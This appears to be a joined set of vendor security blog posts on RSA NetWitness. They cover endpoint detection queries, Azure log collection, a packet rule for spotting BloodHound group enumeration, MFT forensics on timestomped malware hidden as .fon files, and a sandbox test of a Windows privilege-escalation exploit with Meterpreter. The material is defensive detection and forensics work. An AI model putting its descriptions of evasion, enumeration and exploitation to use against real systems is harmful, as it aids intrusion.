There are many instances where a modified filename could be an indicator of evasive execution on a machine. In other words, it could be evidence of an attempt to avoid detection by antivirus or monitoring systems. The following IIOCs compare module attributes with the associated filename for anomalies based on observed techniques.


Copied Shell

Windows accessibility features have been a known target of replacement to regain access to a system by both malicious actors and system administrators for a long time. Furthermore, actors occasionally rename shells and scripting hosts to bypass security monitoring tools. For these reasons, the following IIOC looks for instances of the Windows shells and scripting hosts that have been renamed. It is also looking for instances where the trusted install user (“NT SERVICE\TrustedInstaller”) is no longer the owner of one of these files.


Copied Windows Shell

Figure 16: Copied Windows Shell



Currently, there is a built-in IIOC called “Run Remote Execution Tool” that looks for instances of Psexec execution. However, a common issue in endpoint monitoring is the lack of full visibility, and consequently the machine running the client program is not always being observed. Therefore, when looking for evidence of potential lateral movement, it is important to monitor for suspect behavior of the target machine as well.


Psexec is known to create a service on the target machine using the executable “psexesvc.exe”. It also provides the ability for the user to change the name of the service, and subsequently the name of the executable to a different value. Similar to the previous example, this change in name does not affect the file description of the executable. Thus, the IIOC author can specifically look for occurrences of this name modification. The creator of this IIOC could also choose to include instances of the normal psexec service filename by omitting the second condition, but a separate IIOC with a higher IIOC level would be more appropriate.


Renamed Psexesvc

Figure 17: Renamed PSexesvc Process


Suspicious Launchers

Malware and malicious actors often utilize proxied execution, or launchers, for their persistence mechanisms in order to bypass security monitoring tools. PowerShell is a prime example of a program that facilitates this behavior in Windows. Executing this program upon startup provides an attacker with a wealth of functionality within a seemingly legitimate executable.  The IIOC shown in Figure 18 identifies instances of PowerShell that are associated with a persistence mechanism on an individual machine.


PowerShell Autostart

Figure 18: PowerShell Autostart


Typically, legitimate instances of this functionality created by system administers will simply reference a PowerShell script instead of the Powershell module itself. Nonetheless, analysts should still be cognizant of potentially valid instances. This is demonstrated in the next query in Figure 19, which contains additional conditions that the filters autostart programs or scheduled tasks that match the given keyword.


Figure 19: PowerShell Autoruns and Scheduled Tasks


This new query utilizes a SQL union to combine the results of two select statements. Instead of initially selecting from the “machinemodulepaths” table and filtering from the rows, this query uses two tables that contain additional startup program information. With these additional data points, the IIOC author can filter on attributes such as task name and registry path. An example of the latter would be a unique run key name. Since the second IIOC utilize tables from scan data, it would need to be set to persistent.


PowerShell Injected Code

Figure 20: Floating Module in PowerShell in UI


Another attribute of a process that may be indicative of a malicious launcher is the presence of injected code. Executable files that circumvent the Windows image loader, otherwise known as reflective loading, as well as libraries that have been unreferenced from PEB ldr_data lists will show up in the NWE UI as “Floating Modules.” While there is already an IIOC looking for the presence of these modules, augmenting the existing query by including known launcher processes such as PowerShell can produce inherently more suspicious results. By increasing the specificity of the query, we now have an additional IIOC that is a higher indicator of malicious activity.


Figure 20: Floating Module in PowerShell Query


There are numerous modules other than PowerShell that can be utilized to initiate execution on Windows systems such as mshta, rundll32, regsvr32, installutil, etc. Similar IIOCs for all of these modules can be useful for monitoring evasive execution or persistence. However, in each case, there will be filtering required that is specific to an individual organization.


The End.

Hopefully this article has provided insight into custom IIOC creation. It has covered the key components of basic IIOCs and provided steps for their creation. Additionally, it has discussed the most useful backend database tables and fields used for building IIOC queries. Lastly, it has provided examples that can be used to identify real-world attacker techniques.



Customers that use Azure cloud infrastructure require the ability to enable their Security Operations Center (SOC) to monitor infrastructure changes, service health events, resource health, autoscale events, security alerts, diagnostic logs, Azure Active Directory Sign-In and Audit logs, etc. The RSA Netwitness Platform is an evolved SIEM that natively supports many 3rd party sources like Azure Active Directory Logs, Azure NSG Flow Logs, and now Azure Monitor Activity and Diagnostic Logs for depth of visibility and insights to enable SOC analysts and threat hunters.


Azure Monitor Activity and Diagnostic Logs background:


The Azure Activity Log is a subscription log that provides insight into subscription-level events that have occurred in Azure. This includes a range of data, from Azure Resource Manager operational data to updates on Service Health events. Using the Activity Log, you can determine the ‘what, who, and when’ for any write operations (PUT, POST, DELETE) taken on the resources in your subscription. You can also understand the status of the operation and other relevant properties. The Activity Log does not include read (GET) operations or operations for resources that use the Classic/"RDFE" model.


Azure Monitor diagnostic logs are logs emitted by an Azure service that provide rich, frequent data about the operation of that service. Azure Monitor makes available two types of diagnostic logs:

  • Tenant logs - These logs come from tenant-level services that exist outside of an Azure subscription, such as Azure Active Directory logs.
  • Resource logs - These logs come from Azure services that deploy resources within an Azure subscription, such as Network Security Groups or Storage Accounts.


Azure Monitor Activity Logs:


Azure Monitor Diagnostic Logs:


Azure Monitor Active Directory Logs:


Azure Monitor Activity, Diagnostic and Azure Active Directory Logs can be exported to an Event Hub. The RSA NetWitness Platform’s Azure Monitor plugin collects the logs from this Event Hub.




                                                                                                   *In Log Collection, Remote Collectors send

                                                                                                    Events to the Local Collector and the Local

                                                                                                    Collector sends events to the Log Decoder


Configuration Guide: Azure Monitor Event Source Configuration Guide

Collector Package on RSA Live: "MS Azure Monitor Log Collector Configuration"

Parser on RSA Live: CEF

When attacking or defending a network it is important to know the strategic points of the environment. In the case an environment is running Active Directory, as almost every organization in the world does, it is important to understand how rights and privilege relationships work, as well as how they are implemented. With relative ease, an attacker can take advantage of the fact that an unintended user was somehow added to a group with more elevated privileges than he/she needs. Once they are able to identify this the battle might be over before the defender has a chance to know what happened.  In this blog post, we will go through how RSA NetWitness Network/Packets can be utilized to detect if BloodHound’s Data Collector (known as SharpHound) is being used in your environment to enumerate Group Membership via the LocalAdmin Collection method.


In order to automate the process of determining the privilege relationships in an environment, the incredibly talented group of @_wald0, @CptJesus, and @harmj0y created a very popular tool aptly named BloodHound. You can find this awesomeness at  The tool is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell/C# ingestor. The tool utilizes graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. This is an incredibly awesome tool that provides a much needed insight into what is often a forgotten or mismanaged process.  If you haven’t tried this out on your environment, offensive or defensive minded, I’d recommend it.


SharpHound is a completely custom C# ingestor written from the ground up to support collection activities. Two options exist for using the ingestor, an executable and a PowerShell script. Both ingestors support the same set of options. SharpHound is designed targeting .Net 3.5. SharpHound must be run from the context of a domain user, either directly through a logon or through another method such as RUNAS. The functionality we will be analyzing in this blog post is only a small percentage of what BloodHound/SharpHound can do and other portions will be covered in upcoming blog posts.


First let’s tackle some minimum requirements & some assumptions that we have put in place:

#1) This assumes you have a TAP location feeding your Decoder(s) somewhere between your workstations & your Domain Controllers (DC). This is a best practice to ensure that traffic flows to all critical devices, including DCs, are being captured.

#2) You’ve created a Feed with a list of your Domain Controllers & are tagging them appropriately. (While not 100% necessary this will definitely aid in analysis) This can easily be accomplished by modifying the Traffic Flow Lua Parser to include DC subnets, or one by one. Please see this guide for further details. 

#3) BloodHound Data Collector is performing Local Admin Collection Method – SharpHound has several different enumeration options, as are listed on BloodHounds GitHub wiki, while it’s possible to catch some of these other options, this post will be focus in on how its Local Admin Collection Method works.  Further technical details on how this method works can be found on @cptjesus's blog post here.  CptJesus | SharpHound: Technical Details 

#4) I am not an Active Directory or BloodHound expert by any stretch. What is detailed in this blog post is what a colleague (Christopher Ahearn) & I discovered by attempting to help our clients detect badness.


Now then, let’s begin.


Group Enumeration

As soon as SharpHound starts up it will attempt to connect to the workstation’s default Domain Controller over LDAP (TCP Port 389) with the current user’s privileges, in order to enumerate information about the domain. It is important to note the latest version (2.1) of SharpHound will grab a list of domain controllers available for each domain being enumerated, starting with the primary domain controller, and then do a quick port check to see if the LDAP service is available[1]. Once the first one is found, it will cache the domain controller for that domain and use it for LDAP queries. In our testing this traffic will contain LDAP searchRequests & binds, then becomes encrypted with SASL, which will provide no insight into what’s actually being enumerated, as depicted below.   I know, frustrating.



However depending on the size of your domain this can be an indicator itself, as there can be a lot of data being transferred. Looking for one host with an abnormal amount of LDAP traffic can be a starting point to look for BloodHound, however, this is highly dependent on your environment as there may be legitimate reasons for the traffic. 

What happens next can be used as a more high fidelity alert. The host running BloodHound will attempt to enumerate the group memberships for users found in the LDAP Queries. and does so in a unique manner. In order to enumerate this information the host creates an RPC over SMB connection to the Domain Controller. How this occurs is the host will first create a named pipe to SAMR - Security Account Manager (SAM) Remote Protocol (Client-to-Server) - over the IPC$ share.


Once this is accomplished the RPC Bind command is used to officially connect the RPC session. Now that the RPC session is available, SharpHound will attempt to request in the following order

  1. Connect5
  2. LookupDomain
  3. OpenDomain
  4. OpenAlias
  5. GetMembersInAlias



To start off, the SamrConnect5 method obtains a handle to a server object, while only requiring a string input for the ServerName. Next the session will call SamrLookupDomaininSamServer which required a handle to the server object provided by the SamrConnect5, in order to look up all the domains hosted by the server side protocol. Now that the session has a handle to work with, it then proceeds to look up the domain with and use SamrOpenDomain to obtain a handle for the Domain Object. As you can see this was an iterative process in order to get handle for first, the Server Object, then the Domain Object, which will then be used in SamrOpenAlias to obtain a handle to an alias. Finally the session will use the alias handle as input to the SamrGetMembersinAlias with the goal of enumerating the SIDs for the members of the specified alias object. After SamrGetMembersinAlias completes it’s response the SAMR session is then closed, and in it’s place an Local Security Authority (LSA) RPC session is started.


As the name states, the lsarpc interface is used to communicate with the LSA subsystem. Similar to how SharpHound had to find all the necessary handles in order to finally enumerate the SIDs in a given group, it must also find a Policy handle to convert the discovered SIDs from SamrGetMembership. In order to do that it utilizes OpenPolicy2, which only requires the SystemName, which in this case will be the DC. Once the OpenPolicy2 has finished & acquired the Policy Handle it then calls the LookupSids2 method in order to resolve the SIDs it acquired in the SamrGetMembersinAlias. Now the Data Collector has all the information it needs to provide information concerning what Users are in what groups.


During RSA’s enterprise testing of BloodHound, this unique way of enumerating Group Membership via SamrGetMembersinAlias, and subsequently looking up the acquired SIDs via LsarLookUpSids2 in the same session, has a very high detection rate of BloodHound activity. It should be noted that this activity has the potential to be normal activity depending on the various administration techniques being used by administrators, however, during our testing in various large environments we have not found an instance of its usage in that capacity.


Detecting with RSA NetWitness Packets

NetWitness packets does an incredible job dissecting the various different RPC & SMB actions that cross over capture points, which make creating detection rather simple. As the RPC session is being transported via SMB all of the necessary metadata found in our analysis is in one session.



The following application rule will flag sessions which contain this activity.


(service =139) && (directory = ‘\IPC$\') && (analysis.service = ‘named pipe’) && (filename = ‘samr’) &&  (action = ‘samrconnect5’) && (action = ‘SamrLookupDomaininSamServer’) && (action = ‘samropendomain’) && (action = ‘samropenalias’) && (action = ‘SamrGetMemberinAlias’) && (action = ‘lsaropenpolicy2’) && (action = ‘lsarlookupsids2’)


Wrapping Up

This blog’s intent was to bring up new and interesting ways to detect BloodHound traffic with the specific context of running the LocalAdmin Collection method from a workstation in a domain to a DC. It’s possible that this traffic could be used legitimately via an Administrators script or it’s also possible that it might be an indicator for another tool using a similar enumeration method. Every environment is different from the next and each needs to be analyzed with the proper context in mind, including this traffic. If you are defending a network, I would encourage that you try out BloodHound, even if it’s just in a Lab environment, and see what your toolsets can detect. If you’re not already monitoring traffic going in and out of your DC’s I would also encourage you to try more play books aside this one attack vector, and to help determine potential visibility gaps. In the upcoming blog posts we’ll attempt detection of other methods used by Bloodhound.



RSA Netwitness Endpoint (NWE) offers various ways to alert the analyst of potentially malicious activity. Typically, we recommend that an analyst look at the IIOCs daily, and investigate and categorize (whitelist/graylist/blacklist) any hits on IIOC Level 0 and Level 1.


When an IIOC highlights a suspicious file or event, the next investigative step is to look at the endpoint where the IIOC hit, and investigate everything related to the module and/or event. Depending on the type of IIOC, the analyst can get answers related to the file/event in any or all of the following categories of data:

  • Scan data
  • Behavioral Tracking Events
  • Network Events

NWE Data Categories


If we focus on a Windows endpoint, regardless of whether it is part of an investigation or a standalone infected system, we always complement the analysis of data that has been automatically collected by the agent, with an analysis of the endpoint's Master File Table (MFT). There are very good reasons to always analyze the MFT in these situations. Let me list the main reason here:

  • The automatically collected data (scan, behavioral, network) is always a subset of all the actual events that happen on the endpoint. Namely, the agent collects process, file, and registry related events but with some limitations. For example, while the agent records file events, it is focused on executable files rather than all file events. So, looking at the MFT around the time of the event will enable the analyst to discover and collect additional artifacts related to an incident, such as, non-executable files related to an incident. These non-executable files can be anything, from the output of some tool the attacker executed (such as a password dumper) to archive files related to data theft activity, to configuration files for a Trojan, etc.


Let us first describe some key concepts related to the MFT so that you can get the best value out of your analysis of it. 


What is the MFT?

In general, when you partition and format a drive in Windows, you will likely format it with the New Technology File System (NTFS). The MFT keeps track of all the files that exist in the NTFS volume, including the MFT file itself. The MFT is a file that is actually named $MFT in the NTFS, and the very first entry inside this file is a record about the $MFT file itself. Just so that you are aware, on average, a MFT file is around 200MB. If you open a $MFT file using a hex editor, you can see the beginning of each MFT record marked by the word "FILE":


MFT Record Example


The MFT keeps track of various information about the files on the file system, such as filename, size, timestamps, file permissions, as well as where the actual data of the file exists on the volume. The MFT does not contain the data of the file (unless the file is a few bytes small < 512 bytes), but instead it contains metadata about each file and directory on the volume. Perhaps the easiest way to understand the MFT is to think of a library that uses index cards to keep track of all the books in it. The MFT is like the box containing these index cards, where each index card tells you the title of the book and where to find a particular book in the library. The index card is not the book, it just contains information about the book.


The library analogy is also useful to describe a few other concepts regarding the MFT. In this imaginary library, the index cards are never discarded, but rather reused. So, when the library wants to remove a book from its records, it would just mark the index card related to the book as available to contain the information about some new book. Notice that in this situation the index card still contains the old information, and the book is still sitting on a shelf in the library. This situation remains true, until the information in the index card is overwritten by the information of a new book. What we are describing here is the process of a file deletion in Windows (and we are not talking about the Recycle Bin here but actual file deletions). Namely, when a file is deleted in Windows, the MFT record for that file is marked as available to be overwritten by some other new file that will be created in the future. So, deleting a file does not mean deleting its information, or the actual data of the file. Windows just does not show the user files marked as deleted in the MFT. The data may still be there though, and depending on how busy the system is, i.e. how many files are created/deleted, you have a good chance of recovering a deleted file if you get to it before it is overwritten.


When NWE parses the MFT, it shows you both regular MFT records, and those that have been marked as Deleted. The deleted records can also be grouped by themselves (more on this later). However, NWE does not do file recovery, meaning it will not get you the data of a deleted file. It will only show you the information that exists in the MFT of that deleted file. In order to recover a deleted file, you will need to use other forensic tools on the actual endpoint, or an image of the drive, to recover the data of the deleted file. NWE is able to retrieve any other file referenced in the MFT that is not marked as deleted.


MFT Timestamps

Another very important concept about the MFT is related to file timestamps. The MFT contains 8 timestamps in it for each file (a folder is also considered as a file in the MFT) on the endpoint. These 8 timestamps are contained within two attributes named $Standard_Information ($SI) and $Filename_Information ($FN). So, each of these attributes contains these time stamps:


   $SI Timestamps                                          $FN Timestamps

   - Created                                                      - Created

   - Modified                                                     - Modified

   - Accessed                                                   - Accessed

   - MFT Entry Modified                                   - MFT Entry Modified


Whenever you look at the properties of a file using explorer.exe, you see the first three $SI timestamps. Here is an example of looking at the properties of a file named kernel32.dll:


Explorer.exe showing $SI timestamps


So, you may wonder what is the MFT Entry Modified time, and what is the purpose of the other equivalent timestamps under the $FN Attribute. The MFT Entry Modified is a timestamp that keeps track of when changes are made to the MFT record itself. Think of it as when the library index card is updated, Windows keeps track of those updates through this MFT Entry Modified timestamp. Windows does not show this timestamp through explorer.exe or any other native Windows tools because this timestamp is not relevant to the typical user.


Typically, when we talk about a file, in our mind we think of it based on its name. However, the name of a file is just one property of a file. This distinction is important as we talk about the $FN timestamps. Whenever a file is created so is its filename, because in order to create a file you have to specify a name. However, Windows creates two sets of timestamps associated with a file object. You can think of the $SI timestamps as associated with the file object itself, and of the $FN timestamps as associated with the filename of the file object.


The reason why we are talking about all these timestamps is because during the analysis of a MFT, time is critical in identifying relevant events. You want to ensure that you are sorting the files based on a reliable timestamp. When it comes to the fidelity of the timestamps, the $FN timestamps are your friend. It is trivial to change the $SI timestamps (Created, Modified, Accessed). In fact, Windows has API functions that allow you to do that. So, many attackers code their droppers to manipulate the $SI timestamps of their files, so that if you are a typical user using explorer.exe to view the properties of a file, you will be tricked into believing that the file was created much further in the past then in reality (attackers typically backdate files). So, during our analysis of the MFT we sort files by their $FN Created Time or the $FN MFT Entry Modified time, since these would likely have the exact timestamp of when the file was created on disk. There are various situations when a file is renamed, moved on same volume, moved to a different volume, etc. that affect these 8 timestamps in various ways depending on the Windows operating system. We will not cover these here as it will require a blog on its own. For more details on these situation there are various write ups online. 


How To Request and Open the MFT

  • Since a Windows endpoint may have multiple NTFS volumes it means that each volume (or partition, or drive letter) will have its own MFT. So, if the endpoint has multiple drive letters C:, D:, E:, etc, each of them will have its own MFT. In NWE you can request the MFT by right-clicking the endpoint's machine icon, Forensics > Request MFT.


Steps to request MFT


  • NWE will request the Default Drive, which means it will request the MFT from the volume where Windows is installed (typically C:). However, here you can request the MFT of any drive letter from the drop down.


Request MFT by drive letter


  • You may wonder how do you know in advance how many volumes exist on the endpoint. This information is available to the analyst under the More Info tab:


More Info tab


  • Once you request the MFT, it will show up within a few seconds under the Downloaded tab. This is where you should also open the MFT. In order to open the MFT, you should right click on the MFT and select Download and Open MFT. NWE will then ask you where you want to save the MFT file itself. It is a good practice to have a folder named Analysis, under which you can create subfolders for each endpoint you are investigating. Under this subfolder you can save all the artifacts related to this endpoint, including the MFT.


How to open downloaded MFT


Sample MFT Analysis


When you open the MFT using the method described above, NWE will automatically associate the MFT with the endpoint that it came from. NWE will assume the MFT belongs to the C: volume. If this is not the case you can change the drive letter as shown below:


MFT drive letter and endpoint

As you can see on the left side you can select various folders under the root of C:, look at only files that are marked as deleted in the MFT, or look at All Files. Generally, we want to look at all files to get a global view of everything and start our analysis with whatever file brought us to this system. Sometimes, it is not necessarily a particular file but an event in time. In this case we can then start our analysis by looking at files at that particular time. 


Before we look at an example, let us also talk about what columns you should have in front of you to ensure you can be successful in your analysis. We recommend that you have at least the following columns exposed (hiding the rest if you wish) in this order from left to right. 

  • Filename
  • Size
  • Creation Time $FN (you should also sort the files by this column)
  • Creation Time $SI (this is for comparison purposes to $FN)
  • Modification Time $SI (you want the $SI modification time because the $FN timestamps are only good for creation times, not subsequent modifications to the content of the file)
  • Full Path
  • MFT Update Time $SI
  • MFT Update Time $FN (sometimes the $FN timestamp maybe backdated, so this timestamp can be used instead)


You can expose additional columns if you wish, but these should be in this order to maximize the effectiveness of your analysis. In order to select/deselect which columns you wish to see, you can right-click on the column:


Column Chooser


Let us now go over an example of why you need to MFT. We start the analysis by reviewing the IIOCs, which as we mentioned, should be something that is done daily. We notice that a suspicious file is identified under the "Autorun unsigned Winsock LSP" IIOC as shown below:


Winsock LSP IIOC

We see two files with the same name listed here uixzeue.dll, which means even though they have the same name, they have different hash values. Let us pull the MFT for this system and see what else occurred on this system that we would not see in Behavioral Tracking for reasons that will be explained below. When we open the MFT, we select All Files on the left pane, and make sure we sort by $FN Creation Time column. A system can have over 100,000 files in it, so to quickly get to the one we are interested in, we can search (CTRL-F) for the file name as shown below:


Step 1: Find file of interest

As we can see in the example above, whatever the attacker used to drop these DLLs on this endpoint, it time stomped the $SI timestamps by backdating them. If we were to sort and perform our analysis on the $SI Creation Time we would be way off of any relevant events about this malware. The $FN Creation Time shows the true time the file was created (born) on this endpoint. After identifying the file of interest we can then clear the search field to again view all files, but NWE will keep the focus on these two files. When you perform analysis on the MFT, the idea is to look at any files Created and/or Modified around the time of interest. What we notice is that a few microseconds before the DLLs showed up, two .fon files were created.


FON files

NWE will have not recorded anything related to these .FON files because they are just binary files. In fact they are the bulk of the malicious code, but its content is encrypted. The job of the DLL after it is loaded is to open the .FON file, decrypt it, and load its code in memory. The malicious code and the C2 information is all encrypted inside these .FON files. By the way, these are not FONT files in any way. They are just stored in the \fonts folder and have the .fon extension just to blend in with the other file extensions in that folder.


So, as you can see every time you are chasing a malicious file down you should always also look at the endpoint's MFT to ensure that you have discovered all related artifacts associated with the malicious event. 


Happy Hunting!

A question was posed to our team by one of the engineers; had we seen the new Chrome and Microsoft zero-day exploits using RSA NetWitness Endpoint?  I honestly didn't even know about these exploits and so I had to do some research.  I found the initial Google Blog post here: Google Online Security Blog: Disclosing vulnerabilities to protect users across platforms.  The first vulnerability (NVD - CVE-2019-5786) is the Google Chrome vulnerability and the second was disclosed to Microsoft by Google but as of the time I am writing this, no patch had been released by Microsoft.


Other articles and blogs that talk about these zero-days say they are being used in conjunction with each other. There was no proof of concept code nor any exploits I could use from the research I did. I did see some articles talking about these being exploited in the wild but I couldn’t find any other details. The second zero day is a Windows 7 32 bit privilege escalation vulnerability which does a null pointer dereference in win32k.sys. I found a similar privilege escalation exploit for CVE-2014-4113 and successfully exploited a box in my sandbox environment while it had an NetWitness Endpoint agent on it. The two IIOCs that fired that would help detect this attack were:


IIOC 1 - “Creates process and creates remote thread on same file”
IIOC 2 - “Unsigned creates remote thread”


The remote thread in this case was on notepad.exe which is common of Meterpreter.


The exploit I used can be found here: It also does a null pointer dereference in win32k.sys similar to the Microsoft zero-day.  Below are some screenshots of what I saw from the attacker side and the NetWitness Endpoint side.


Here you can see the the exploit being injected in process ID 444.



Here is the entry in RSA NetWitness Endpoint.



Another entry is lsass.exe opening notepad.exe after the remote thread creation.  I believe this is the actual privilege escalation taking place.  It also makes sense because the timestamp matches exactly to the timestamp in Kali.



Here are the IIOCs which I believe are the initial meterpreter session based on timestamps.   It's still an indication of suspicious activity and when combined with lsass.exe opening the same remote thread process, it raises even more alarms.



I gave this to the engineer in hopes that the new Microsoft zero-day could be detected in the same way and even though we don't know the details of the Google Chrome vulnerability, we do know they are being exploited together.  This could help possibly identify this attack that has been seen in the wild.  Also, on another note, the fact that two zero-days are being exploited in the wild together just screams of a well-funded advanced adversary and it's a relief to know that our tool out-of-the-box should be able to help find this type of activity.

In line with some of my other integrations, I recently decided to also create a proof-of-concept solution on how to integrate RSA NetWitness meta data into an ELK stack.


Given that I already had a couple of Python scripts to extract NetWitness meta via the REST API, I quickly converted one of them to generate output in an ELK-friendly format (JSON).


Setting up an ELK instance is outside the scope of this post, so with that done all I needed was a couple of configuration files and settings.


Step #1 - Define my index mapping template with the help of curl and the attached mappings.json file.

curl -XPUT http://localhost:9200/_template/netwitness_template -d @mappings.json

NOTE: The mappings file may require further customization for additional meta keys you may have in your environment.


Step #2 - Define my Logstash configuration settings.

# Sample Logstash configuration 
# Netwitness -> Logstash -> Elasticsearch pipeline.

input {
  exec {
    command => "/usr/bin/python2.7 /usr/share/logstash/modules/ -c https://sa:50103 -k '*' -w 'service exists' -f /var/tmp/nw.track "
    interval => 5
    type => 'netwitness'
    codec => 'json_lines'

filter {
   mutate {
      remove_field => ["command"]

output {
  elasticsearch {
    hosts => ["http://localhost:9200"]
    index => "netwitness-%{+YYYY.MM.dd}"

Again a level of ELK knowledge will be required that is outside the scope of this post. However, on the command section a few settings may require additional clarification, the Python code has them documented but for ease of reference, I'm listing them below:


  1. The REST endpoint from where to collect the data
  2. The list of meta keys to retrieve (in the example below '*' refers to all available meta keys)
  3. The SDK query that references the sessions that should be retrieved (in the example below, collect all "packet sessions" meta data)
  4. A tracker file location so only new data is retrieved by each execution on the input command. (i.e. continue from last data previously retrieved)
-c https://sa:50103 
-k '*'
-w 'service exists'
-f /var/tmp/nw.track


There will be additional configuration settings and steps required in ELK, once again, there's plenty of information available on this already as the open source solution that ELK is, so I won't go into that. I'm by no means an expert on ELK.


Finally, all that is left to show you is how the data looks. First, some of my Dynamic DNS events.


List of NetWitness Events in ELK


Below the details of one of those events.

 DynDNS Event Details



As a proof-of-concept all these details and scripts are provided as-is without any implied support or warranty. I'm not really that experienced in ELK as so I'm sure that someone can probably improve on this significantly, if you do feel free to share your experiences below in the comments section.


Thank you,



Filter Blog

By date: By tag: